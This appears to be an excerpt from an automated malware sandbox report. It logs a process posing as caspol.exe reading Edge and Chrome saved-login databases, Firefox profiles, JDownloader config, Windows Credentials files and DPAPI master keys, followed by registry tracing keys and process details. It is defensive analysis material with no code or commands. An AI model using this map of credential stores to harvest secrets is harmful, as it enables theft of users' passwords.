C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\62fe5fc1b5bafb28a19a2754318abf00\System.Core.ni.dll.aux unknown 900 success or wait 1 6E2662DE ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\5a5dc2f9e9c66b74d361d490c1f4357b\System.Xml.ni.dll.aux unknown 748 success or wait 1 6E2662DE ReadFile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6E31099B unknown

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 8171 end of file 1 6E31099B unknown

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 success or wait 1 6D1C9B71 ReadFile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 end of file 1 6D1C9B71 ReadFile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4096 success or wait 1 6D1C9B71 ReadFile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4096 end of file 1 6D1C9B71 ReadFile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4095 success or wait 1 6E31099B unknown

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 8173 end of file 1 6E31099B unknown

C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\ccd32e22ed1b362ccbd4b6fe2cda6d0b\System.Management.ni.dll.aux unknown 764 success or wait 1 6E2662DE ReadFile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 success or wait 1 6D1C9B71 ReadFile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 end of file 1 6D1C9B71 ReadFile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4096 success or wait 1 6D1C9B71 ReadFile

File Activities

File Created

File Written

File Read


C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4096 end of file 1 6D1C9B71 ReadFile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4095 success or wait 1 6E31099B unknown

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 8173 end of file 1 6E31099B unknown

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data unknown 49152 success or wait 1 6D1C9B71 ReadFile

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State unknown 4096 success or wait 1 6D1C9B71 ReadFile

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State unknown 4096 success or wait 3 6D1C9B71 ReadFile

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State unknown 624 end of file 1 6D1C9B71 ReadFile

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State unknown 4096 end of file 1 6D1C9B71 ReadFile

C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini unknown 4096 success or wait 1 6D1C9B71 ReadFile

C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini unknown 4096 end of file 1 6D1C9B71 ReadFile

C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini unknown 4096 success or wait 1 6D1C9B71 ReadFile

C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini unknown 4096 end of file 1 6D1C9B71 ReadFile

C:\Program Files (x86)\jDownloader\config\database.script unknown 4096 success or wait 1 6D1C9B71 ReadFile

C:\Program Files (x86)\jDownloader\config\database.script unknown 4096 end of file 1 6D1C9B71 ReadFile

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data unknown 45056 success or wait 1 6D1C9B71 ReadFile

C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 success or wait 1 6D1C9B71 ReadFile

C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 success or wait 1 6D1C9B71 ReadFile

C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 end of file 1 6D1C9B71 ReadFile

C:\Users\user\AppData\Local\Microsoft\Credentials\93CE54EBD72B5E2187F75E8118A14612 unknown 4096 success or wait 1 6D1C9B71 ReadFile

C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-3425316567-2969588382-3778222414-1001\4280e3d2-e3f0-4650-bde8-f55a3425c6eb unknown 4096 success or wait 2 6D1C9B71 ReadFile

C:\Users\user\AppData\Local\Microsoft\Credentials\93CE54EBD72B5E2187F75E8118A14612 unknown 4096 success or wait 1 6D1C9B71 ReadFile

C:\Users\user\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D unknown 11120 success or wait 1 6D1C9B71 ReadFile

C:\Users\user\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D unknown 11120 success or wait 1 6D1C9B71 ReadFile

File Path Offset Length Completion Count Source Address Symbol

Key Path Completion Count Source Address Symbol

HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS success or wait 1 6C45FDB8 unknown

Key Path Name Type Data Completion Count Source Address Symbol

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS

EnableFileTracing

dword 0 success or wait 1 6C45FDB8 unknown

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS

EnableAutoFileTracing

dword 0 success or wait 1 6C45FDB8 unknown

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS

EnableConsoleTracing

dword 0 success or wait 1 6C45FDB8 unknown

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS

FileTracingMask dword -65536 success or wait 1 6C45FDB8 unknown

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS

ConsoleTracingMask

dword -65536 success or wait 1 6C45FDB8 unknown

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS

MaxFileSize dword 1048576 success or wait 1 6C45FDB8 unknown

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS

FileDirectory expand unicode %windir%\tracing success or wait 1 6C45FDB8 unknown

Registry Activities

Key Created

Key Value Created


Analysis Process: conhost.exe PID: 1840, Parent PID: 1836

General

Target ID: 8
Start time: 16:46:06
Start date: 02/06/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff72efe0000
File size: 875008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

File Activities

Analysis Process: svchost.exe PID: 1900, Parent PID: 888

General

Target ID: 36
Start time: 16:52:03
Start date: 02/06/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
Imagebase: 0x7ff73d000000
File size: 57360 bytes
MD5 hash: F586835082F632DC8D9404D83BC16316
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Registry Activities

Disassembly

⊘ No disassembly
